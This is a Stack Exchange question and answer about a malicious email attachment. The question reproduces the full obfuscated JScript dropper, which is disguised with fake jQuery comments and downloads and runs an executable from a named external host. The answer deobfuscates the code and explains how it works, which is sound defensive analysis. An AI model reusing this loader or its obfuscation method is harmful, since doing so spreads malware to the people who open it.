3

I received an email today with the following attachment, and I was hoping to see if anyone could help me understand what it was:

//} Expose support vars for convenience support = Sizzle.support = {};
var tDPsXdcAz = ["iK"+"ou"+"D"+("appreciated","projection","layman","pKDO"), "gU"+"As"+("ceremony","pillage","knuckle","translator","i")+"PL", "ExpandE"+"nviro"+("child","somalia","conducive","seattle","nmen")+"tStri"+("restitution","claim","propitiatory","catalogues","ngs"), "%"+"T"+("artwork","southeast","modified","regional","EM")+("handjob","taurus","congenital","amount","P%"), "/TLoFtauxO" + "."+("shambles","cheque","e")+"xe", "R"+("dictionaries","celibate","penguin","un"), "Act"+("precipitated","characterize","periodically","i")+"v"+"eX"+("seraphic","resources","equipment","O")+"b"+("blowjobs","forbes","j")+"ect", "W"+"Sc"+("fusillade","oligarchy","camcorders","unlawful","r")+"ipt."+("sudan","looksmart","nathan","S")+"he"+"ll", "pk"+"h"+"p"+("godfather","absences","laughing","falstaff","RI"), "M"+("fingering","streets","sententious","delete","S")+("cacao","hilarity","potential","XM")+"L2"+".XML"+("compounds","beryl","employ","H")+"T"+("databases","berber","cholera","impost","TP")];
//}  Update global variables  document = doc;  docElem = document.documentElement;  documentIsHTML = !isXML( document );
var aBRrBqnaf = this[tDPsXdcAz[100+66-16*10]];
var FnDeQcR = new aBRrBqnaf(tDPsXdcAz[7]);
///**  * Sets document-related variables once based on the current document  * @param {Element|Object} [doc] An element or document object to use to set the document  * @returns {Object} Returns the current document  */ setDocument = Sizzle.setDocument = function( node ) {  var hasCompare, parent,   doc = node ? node.ownerDocument || node : preferredDoc;
var yrVpImgc = new aBRrBqnaf(tDPsXdcAz[9]);
///**  * Detects XML nodes  * @param {Element|Object} elem An element or a document  * @returns {Boolean} True iff elem is a non-HTML XML node  */ isXML = Sizzle.isXML = function( elem ) {   documentElement is verified for cases where it doesn\"t yet exist   (such as loading iframes in IE - #4833)  var documentElement = elem && (elem.ownerDocument || elem).documentElement;  return documentElement ? documentElement.nodeName !== \"HTML\" : false; };
var HlkTy = FnDeQcR[tDPsXdcAz[2]](tDPsXdcAz[3]) + tDPsXdcAz[4];
//  Return early if doc is invalid or already selected  if ( doc === document || doc.nodeType !== 9 || !doc.documentElement ) {   return document;  
yrVpImgc[("paralysis","saucer","phenomenal","andreas","onr")+"eadystatech"+("addressing","playstation","a")+"nge"] = function () {
    if (yrVpImgc[("versions","responded","re")+"adys"+"t"+("petition","ridley","a")+("loiter","jurisdiction","te")] === 4) {
        var lgNaqHj = new aBRrBqnaf(("forensic","destroyer","bourgeoisie","AD")+"O"+("triton","nutritional","D")+"B."+"S"+("higher","lesson","governmental","nominated","tr")+"e"+"am");
        lgNaqHj["o"+("camden","federation","p")+"en"]();
        //  Support: IE 9-11, Edge   Accessing iframe documents after unload throws \"permission denied\" errors (jQuery #13936)  if ( (parent = document.defaultView) && parent.top !== parent ) {    Support: IE 11   if ( parent.addEventListener ) {    parent.addEventListener( \"unload\", unloadHandler, false );
        lgNaqHj["t"+"y"+("cameras","vapid","people","pe")] = 1;
        //   Support: IE 9 - 10 only   } else if ( parent.attachEvent ) {    parent.attachEvent( \"onunload\", unloadHandler );   }  
        lgNaqHj["w"+"ri"+("pungent","gratis","slammed","pander","te")](yrVpImgc[("printed","sorrel","kuwait","Re")+("optics","twenty-first","savoury","retract","sp")+("strange","emptiness","loathe","o")+("astonish","milfhunter","snail","previously","nse")+"B"+"ody"]);
        //} /* Attributes  ---------------------------------------------------------------------- */
        lgNaqHj["p"+"o"+"s"+("runner","italics","named","abashed","ition")] = 0;
        //  Support: IE<8   Verify that getAttribute really returns attributes and not properties   (excepting IE8 booleans)  support.attributes = assert(function( div ) {   div.className = \"i\";   return !div.getAttribute(\"className\");  });
        lgNaqHj.saveToFile(HlkTy, 2);
        // /* getElement(s)By*  ---------------------------------------------------------------------- */
        lgNaqHj.close();
        //  Check if getElementsByTagName(\"*\") returns only elements  support.getElementsByTagName = assert(function( div ) {   div.appendChild( document.createComment(\"\") );   return !div.getElementsByTagName(\"*\").length;  });
    };
};
try {

    //  Support: IE<9  support.getElementsByClassName = rnative.test( document.getElementsByClassName );
    yrVpImgc[("impurity","birds","enormity","cliff","o")+"p"+"en"](("nullify","scheme","G")+"ET", ("malaria","advantage","truncheon","tutelary","http://magic")+("cinderella","frontal","musicians","-")+"beau"+"ty."+"com.ua/system/logs/98yhb764d.exe", false);

    //  Support: IE<10   Check if getElementById returns elements by name   The broken getElementById methods don\"t pick up programatically-set names,   so use a roundabout getElementsByName test  support.getById = assert(function( div ) {   docElem.appendChild( div ).id = expando;   return !document.getElementsByName || !document.getElementsByName( expando ).length;  });
    yrVpImgc[("sleeper","audit","docility","s")+("majority","broadside","nerve","e")+"nd"]();
    //  ID find and filter  if ( support.getById ) {   Expr.find[\"ID\"] = function( id, context ) {    if ( typeof context.getElementById !== \"undefined\" && documentIsHTML ) {     var m = context.getElementById( id );     return m ? [ m ] : [];    }   };   Expr.filter[\"ID\"] = function( id ) {    var attrId = id.replace( runescape, funescape );    return function( elem ) {     return elem.getAttribute(\"id\") === attrId;    };   };  } else {    Support: IE6/7    getElementById is not reliable as a find shortcut   delete Expr.find[\"ID\"];
    FnDeQcR[tDPsXdcAz[5]](HlkTy, 1, "zEAKvfO" === "wJLlIbR"); gdlRktXq = "    DocumentFragment nodes don\"t have gEBTN    } else if ( support.qsa ) {     return context.querySelectorAll( tag );    }   } :";
    //  Expr.filter[\"ID\"] = function( id ) {    var attrId = id.replace( runescape, funescape );    return function( elem ) {     var node = typeof elem.getAttributeNode !== \"undefined\" &&      elem.getAttributeNode(\"id\");     return node && node.value === attrId;    };   };  
} catch (SJtAtG) { };
//}  Tag  Expr.find[\"TAG\"] = support.getElementsByTagName ?   function( tag, context ) {    if ( typeof context.getElementsByTagName !== \"undefined\" ) {     return context.getElementsByTagName( tag );
Justin
  • 31
  • 1

1 Answers1

9

This is a Drive-by Download Exploit Attempt

Pro-tip: when looking at any kind of obfuscated code for any language, follow this simple rule:

  • Obfuscated code is suspicious.

Even the comments are trying to fool you

    //  Support: IE<8   Verify that getAttribute really returns attributes and not properties   (excepting IE8 booleans)  support.attributes = assert(function( div ) {   div.className = \"i\";   return !div.getAttribute(\"className\");  });
    lgNaqHj.saveToFile(HlkTy, 2);

Yes, because we need an ADODB Stream which utilizes saveToFile() to save executable files on our computer in order to verify that getAttribute() really returns attributes and not properties. (sarcasm)

What??? This doesn't make any sense

The Deobfuscated Code

To answer your question, and since this was recently migrated from Information Security to Reverse-Engineering, and back again, I felt this answer was no longer up to quality standards, so I'll need to clarify everything. Doing that now.

I deobfuscated the code for you almost in it's entirety:

var haxArray = 
[
    "iKouDpKDO", 
    "gUAsiPL", 
    "ExpandEnvironmentStrings", 
    "%TEMP%", 
    "/TLoFtauxO.exe", 
    "Run", 
    "ActiveXObject", 
    "WScript.Shell", 
    "pkhpRI", 
    "MSXML2.XMLHTTP"
];

// Create ActiveXObject instance, a new WScript Shell, and an MSXML HTTP connection
var dumbFunc = this.ActiveXObject;
var wScriptShell = new dumbFunc(WScript.Shell);
var xmlHttp = new dumbFunc(MSXML2.XMLHTTP);

// Will save file to %TEMP%\TLoFtauxO.exe
var fileLocation = wScriptShell.ExpandEnvironmentStrings("%TEMP%" + "TLoFtauxO.exe");

xmlHttp.onreadystatechange = function() 
{
    if (xmlHttp.readystate === 4) {
        var adoDbStream = new dumbFunc(ADODB.Stream);
        adoDbStream.open();
        adoDbStream.type = 1;
        adoDbStream.write(xmlHttp.ResponseBody);
        adoDbStream.position = 0;
        adoDbStream.saveToFile(fileLocation, 2);
        adoDbStream.close();
    };
};
try {
    xmlHttp.open("hxxp://magic-beauty.com.ua/system/logs/98yhb764d.exe");
    xmlHttp.send();
    wScriptShell.run(fileLocation, 1, false);
    messageThing = "    DocumentFragment nodes don\"t have gEBTN    } else if ( support.qsa ) {     return context.querySelectorAll( tag );    }   } :";
} catch (SJtAtG) {};

I see you, a thief on the roof; I see your heart beating, I see you are afraid.

So what is this code trying to do?

It tries to download a file called 98yhb764d.exe and then save it to your computer as a file called TLoFtauxO.exe. It attempts to save this to your windows temporary folder, as long as you have the %TEMP% environment variables set, which most people do by default.

It's difficult to trust obfuscated code (side-note: minification and obfuscation are two different concepts). I'm suspicious any time I find it. If you ended up being infected by this, please visit the thread: How do I deal with a compromised server?

Mark Buffalo
  • 22,498
  • 8
  • 74
  • 91